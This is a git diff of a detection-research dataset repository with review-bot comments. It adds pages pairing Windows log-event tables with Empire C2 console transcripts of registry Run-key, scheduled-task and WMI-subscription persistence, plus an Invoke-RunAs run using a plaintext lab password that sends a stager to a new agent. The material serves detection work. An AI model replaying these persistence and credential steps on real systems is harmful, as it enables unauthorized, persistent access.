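Review bot: the deleted copy carried a mangled paste line (`FDC01.shire.comhell/lateral_movement/invoke_wmi) > set ComputerName H`) and a duplicated `info` listing around it. The README hunk above now points at the execution/ copy of empire_invoke_wmi.md, which is not part of this diff, so confirm that copy does not still contain the same artifact and that its new Updated stamp (2019-05-18214442 in the table) reflects a regenerated dataset rather than just the move; otherwise the old 2019-03-19152813 value shown in the deleted file is the honest one.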
@@ -4,7 +4,7 @@ An adversary can use registry keys to persist in the environment ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_userland_registry](./empire_userland_registry.md) | 2019-03-19023812 | -| empire | shire | [empire_userland_schtasks](./empire_userland_schtasks.md) | 2019-03-19024742 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_userland_registry](./empire_userland_registry.md) | 2019-03-19023812 | +| shire | [empire_elevated_registry](./empire_elevated_registry.md) | 2019-05-18183936 | \ No newline at end of file diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.md b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.md new file mode 100644 index 00000000..bf04fce1 --- /dev/null +++ b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.md 
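Review bot: the file still ends without a trailing newline (`\ No newline at end of file` on both sides of the hunk); add one. Moving the empire_userland_schtasks row out of T1060 is correct (it reappears under scheduled_task_T1053 below), but the unchanged context line "An adversary can use registry keys to persist in the environment" could now name the keys the two remaining rows cover: the userland variant writes HKCU:Software\Microsoft\Windows\CurrentVersion\Run and the new elevated variant HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run.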
@@ -0,0 +1,117 @@ +# Empire Elevated Registry + +Persist a stager (or script) via the HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. + +## Technique(s) ID + +T1060 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_elevated_registry.tar.gz](./empire_elevated_registry.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18183936 + +## About this file + +| log_name | source_name | task | record_number | +|------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 205 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 106 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 72 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 63 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 37 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 16 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 4 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 3 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 3 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 3 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 2 | +| Security | Microsoft-Windows-Security-Auditing | File System | 2 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 2 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 245 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: 
ImageLoad) | 132 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 59 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 40 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 25 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 16 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 172 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule persistence/elevated/registry* +(Empire: powershell/persistence/elevated/registry) > info + + Name: Invoke-Registry + Module: powershell/persistence/elevated/registry + NeedsAdmin: True + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @mattifestation + @harmj0y + +Description: + Persist a stager (or script) via the + HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry + key. This has an easy detection/removal rating. + +Comments: + https://github.com/mattifestation/PowerSploit/blob/master/Pe + rsistence/Persistence.psm1 + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener False Listener to use. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + KeyName True Updater Key name for the run trigger. 
+ RegPath False HKLM:SOFTWARE\Microsoft\ Registry location to store the script + Windows\CurrentVersion\D code. Last element is the key name. + ebug + Proxy False default Proxy to use for request (default, none, + or other). + ExtFile False Use an external file for the payload + instead of a stager. + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Cleanup False Switch. Cleanup the trigger and any + script from specified location. + ADSPath False Alternate-data-stream location to store + the script code. + Agent True TKV35P8X Agent to run module on. + +(Empire: powershell/persistence/elevated/registry) > set Listener https +(Empire: powershell/persistence/elevated/registry) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task ID 1 +[*] Tasked agent TKV35P8X to run module powershell/persistence/elevated/registry +(Empire: powershell/persistence/elevated/registry) > Registry persistence established using listener https stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug. + +(Empire: powershell/persistence/elevated/registry) > +(Empire: powershell/persistence/elevated/registry) > +``` \ No newline at end of file diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.tar.gz b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.tar.gz new file mode 100644 index 00000000..d81f1425 Binary files /dev/null and b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_elevated_registry.tar.gz differ diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_registry.md b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_registry.md index d25f5caf..10585c14 100644 
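Review bot: the description names only the Run key, but the module output shows two registry writes: the trigger value `Updater` (KeyName left at its default) under HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and the script body under HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug (the RegPath default, confirmed by "stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug"). Document both, since the Sysmon "Registry value set" rows and the Security "Registry" rows in the table are the evidence a reader will go looking for. Minor: the `Removable Storage | 106` row in the Security table is unrelated to the technique; if it is environment noise from the lab host, say so in the About this file section so it is not mistaken for part of the activity.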
--- a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_registry.md +++ b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_registry.md @@ -1,4 +1,3 @@ - # Empire Userland Registry An adversary can use powershell to set a value in HKCU:Software\Microsoft\Windows\CurrentVersion\Run to execute the script in whatever storage mechanism is selected. This will cause the script to run when only this user logs in. @@ -69,7 +68,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 86 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 523 | -## Empire Activity +## Attacker Activity ``` usemodule persistence/userland/registry diff --git a/small_datasets/windows/persistence/scheduled_task_T1053/README.md b/small_datasets/windows/persistence/scheduled_task_T1053/README.md new file mode 100644 index 00000000..0ee65371 --- /dev/null +++ b/small_datasets/windows/persistence/scheduled_task_T1053/README.md @@ -0,0 +1,10 @@ +# Persistence via Scheduled Tasks + +Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_userland_schtasks](./empire_userland_schtasks.md) | 2019-03-19024742 | +| shire | [empire_elevated_schtasks](./empire_userland_schtasks.md) | 2019-05-18184109 | \ No newline at end of file 
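Review bot: the last row of the new scheduled_task_T1053 README links empire_elevated_schtasks to `./empire_userland_schtasks.md`; it should be `./empire_elevated_schtasks.md`, the file added in the next hunk. In the same paragraph, "on the the remote system" should read "on the remote system" and "typically required being a member" should read "typically requires being a member". The file also lacks a trailing newline. The "## Empire Activity" to "## Attacker Activity" rename in empire_userland_registry.md matches the new files and is fine.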
diff --git a/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.md b/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.md new file mode 100644 index 00000000..b8745bda --- /dev/null +++ b/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.md 
@@ -0,0 +1,122 @@ +# Empire Elevated Scheduled Tasks + +An adversary can create scheduled tasks to maintain persistence in the environment. + +## Technique(s) ID + +T1053 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_elevated_schtasks.tar.gz](./empire_elevated_schtasks.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18184109 + +## About this file + +| log_name | source_name | task | record_number | +|------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 253 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 99 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 57 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 20 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 5 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 328 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected 
(rule: NetworkConnect) | 91 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 58 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 22 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 211 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule persistence/elevated/schtasks* +(Empire: powershell/persistence/elevated/schtasks) > info + + Name: Invoke-Schtasks + Module: powershell/persistence/elevated/schtasks + NeedsAdmin: True + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @mattifestation + @harmj0y + +Description: + Persist a stager (or script) using schtasks running as + SYSTEM. This has a moderate detection/removal rating. + +Comments: + https://github.com/mattifestation/PowerSploit/blob/master/Pe + rsistence/Persistence.psm1 + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + DailyTime False 09:00 Daily time to trigger the script + (HH:mm). + OnLogon False Switch. Trigger script on user logon. + ExtFile False Use an external file for the payload + instead of a stager. 
+ ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + Cleanup False Switch. Cleanup the trigger and any + script from specified location. + TaskName True Updater Name to use for the schtask. + IdleTime False User idle time (in minutes) to trigger + script. + ADSPath False Alternate-data-stream location to store + the script code. + Agent True TKV35P8X Agent to run module on. + Listener False Listener to use. + RegPath False HKLM:\Software\Microsoft Registry location to store the script + \Network\debug code. Last element is the key name. + Proxy False default Proxy to use for request (default, none, + or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + +(Empire: powershell/persistence/elevated/schtasks) > set Listener https +(Empire: powershell/persistence/elevated/schtasks) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task ID 2 +[*] Tasked agent TKV35P8X to run module powershell/persistence/elevated/schtasks +(Empire: powershell/persistence/elevated/schtasks) > SUCCESS: The scheduled task "Updater" has successfully been created. +Schtasks persistence established using listener https stored in HKLM:\Software\Microsoft\Network\debug with Updater daily trigger at 09:00. + +(Empire: powershell/persistence/elevated/schtasks) > +(Empire: powershell/persistence/elevated/schtasks) > +``` \ No newline at end of file diff --git a/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.tar.gz b/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.tar.gz new file mode 100644 index 00000000..1ed4f18e Binary files /dev/null and b/small_datasets/windows/persistence/scheduled_task_T1053/empire_elevated_schtasks.tar.gz differ 
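Review bot: the description ("An adversary can create scheduled tasks to maintain persistence in the environment") omits where the payload lives and how it fires, both of which the output states: task name `Updater`, daily trigger at 09:00, and the script stored at HKLM:\Software\Microsoft\Network\debug (the RegPath default), with the module description noting it runs as SYSTEM. Say so, since it explains why a scheduled-task dataset contains Sysmon "Registry value set" and Security "Registry" rows alongside the task creation itself, and tells the reader which task name and registry path to search for.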
diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_schtasks.md b/small_datasets/windows/persistence/scheduled_task_T1053/empire_userland_schtasks.md similarity index 97% rename from small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_schtasks.md rename to small_datasets/windows/persistence/scheduled_task_T1053/empire_userland_schtasks.md index ce047deb..8d2b2977 100644 --- a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_schtasks.md +++ b/small_datasets/windows/persistence/scheduled_task_T1053/empire_userland_schtasks.md @@ -1,11 +1,10 @@ +# Empire Userland Scheduled Tasks -# Empire Userland Schedule Tasks - -An adversary can create a registry key and scheduled task to maintain persistence in the environment. +An adversary can create scheduled tasks to maintain persistence in the environment. ## Technique(s) ID -T1060 +T1053 ## Creators @@ -51,7 +50,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 116 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 192 | -## Empire Activity +## Attacker Activity ``` usemodule persistence/userland/schtasks diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_schtasks.tar.gz b/small_datasets/windows/persistence/scheduled_task_T1053/empire_userland_schtasks.tar.gz similarity index 100% rename from small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/empire_userland_schtasks.tar.gz rename to small_datasets/windows/persistence/scheduled_task_T1053/empire_userland_schtasks.tar.gz diff --git a/small_datasets/windows/persistence/wmi_event_subscription_T1084/README.md b/small_datasets/windows/persistence/wmi_event_subscription_T1084/README.md new file mode 100644 index 00000000..5ed25ba7 --- /dev/null 
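Review bot: the technique ID correction (T1060 to T1053) and the move into scheduled_task_T1053 are right, and "Schedule Tasks" to "Scheduled Tasks" is a good catch, but the rewritten description drops the registry-key mention the old one had ("An adversary can create a registry key and scheduled task"). The userland module, like the elevated variant added above, keeps its script in the registry and only the trigger in the task, so keep that detail so the reader expects registry artifacts alongside the task in this dataset too.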
+++ b/small_datasets/windows/persistence/wmi_event_subscription_T1084/README.md @@ -0,0 +1,9 @@ +# Persistence via WMI Subscriptions + +Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_elevated_wmi](./empire_elevated_wmi.md) | 2019-05-18184306 | \ No newline at end of file diff --git a/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.md b/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.md new file mode 100644 index 00000000..d454cdc2 --- /dev/null +++ b/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.md 
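Review bot: add a trailing newline. Since the paragraph names the filter, consumer and binding objects, one line pointing readers at the three Sysmon WmiEvent rows (WmiEventFilter, WmiEventConsumer, WmiEventConsumerToFilter) and the Microsoft-Windows-WMI-Activity/Operational log listed in the empire_elevated_wmi dataset below would connect the description to the evidence; that is exactly where those three objects show up.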
@@ -0,0 +1,120 @@ +# Empire Elevated WMI Subscription + +Persist a stager (or script) using a permanent WMI subscription. + +## Technique(s) ID + +T1084 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_elevated_wmi.tar.gz](./empire_elevated_wmi.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18184306 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|-------------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 259 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 198 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 114 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 24 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 20 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 16 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 14 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 14 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 13 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 8 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 4 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 47 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1678 | +| 
Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 192 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 100 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 92 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 22 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 13 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 8 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | WmiEventConsumer activity detected (rule: WmiEvent) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | WmiEventConsumerToFilter activity detected (rule: WmiEvent) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | WmiEventFilter activity detected (rule: WmiEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 218 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule persistence/elevated/wmi* +(Empire: powershell/persistence/elevated/wmi) > info + + Name: Invoke-WMI + Module: powershell/persistence/elevated/wmi + NeedsAdmin: True + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @mattifestation + @harmj0y + +Description: + Persist a stager (or script) using a permanent WMI + subscription. This has a difficult detection/removal rating. 
+ +Comments: + https://github.com/mattifestation/PowerSploit/blob/master/Pe + rsistence/Persistence.psm1 + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + DailyTime False Daily time to trigger the script + (HH:mm). + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + ExtFile False Use an external file for the payload + instead of a stager. + Cleanup False Switch. Cleanup the trigger and any + script from specified location. + Agent True TKV35P8X Agent to run module on. + Listener True Listener to use. + SubName True Updater Name to use for the event subscription. + Proxy False default Proxy to use for request (default, none, + or other). + AtStartup False True Switch. Trigger script (within 5 + minutes) of system startup. + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + FailedLogon False Trigger script with a failed logon + attempt from a specified user + +(Empire: powershell/persistence/elevated/wmi) > set Listener https +(Empire: powershell/persistence/elevated/wmi) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task ID 3 +[*] Tasked agent TKV35P8X to run module powershell/persistence/elevated/wmi +(Empire: powershell/persistence/elevated/wmi) > WMI persistence established using listener https with OnStartup WMI subsubscription trigger. + +(Empire: powershell/persistence/elevated/wmi) > +``` \ No newline at end of file diff --git a/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.tar.gz b/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.tar.gz new file mode 100644 index 00000000..b69dcf14 Binary files /dev/null and b/small_datasets/windows/persistence/wmi_event_subscription_T1084/empire_elevated_wmi.tar.gz differ 
diff --git a/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/README.md b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/README.md new file mode 100644 index 00000000..a7806e91 --- /dev/null +++ b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/README.md @@ -0,0 +1,9 @@ +# Access Token Manipulation + +Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_runas](./empire_invoke_runas.md) | 2019-05-18204300 | \ No newline at end of file diff --git a/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.md b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.md new file mode 100644 index 00000000..07ee890f --- /dev/null +++ b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.md 
@@ -0,0 +1,104 @@ +# Empire Invoke Runas + +Adversaries can execute a stager with explicit credentials runas style. + +## Technique(s) ID + +T1134 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_runas.tar.gz](./empire_invoke_runas.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18204300 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 376 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 14 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 145 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 131 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 23 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 14 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 11 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 9 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 8 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 7 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | 
Microsoft-Windows-Security-Auditing | Kerberos Authentication Service | 1 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 42 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 466 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 419 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 363 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 135 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 15 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 325 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| 
Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > scriptimport /tmp/invoke-runas-cmd.ps1 +[*] Tasked TKV35P8X to run TASK_SCRIPT_IMPORT +[*] Agent TKV35P8X tasked with task ID 22 +script successfully saved in memory + +(Empire: TKV35P8X) > scriptcmd Invoke-RunAs -username pgustavo -password "W1n1!19" -domain shire -Cmd cmd.exe -Arguments "/c C:\windows\system32\autoupdate.vbs" + +[*] Tasked TKV35P8X to run TASK_SCRIPT_COMMAND +[*] Agent TKV35P8X tasked with task ID 23 +(Empire: TKV35P8X) > Job started: G16X7P + +Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName +------- ------ ----- ----- ------ -- -- ----------- + 18 4 1528 1200 0.00 6732 1 cmd + + +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent V6W3TH8Y checked in +[+] Initial agent V6W3TH8Y from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to V6W3TH8Y at 10.0.10.103 + +(Empire: TKV35P8X) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 20:43:55 https + TKV35P8X ps 172.18.39.106 HR001 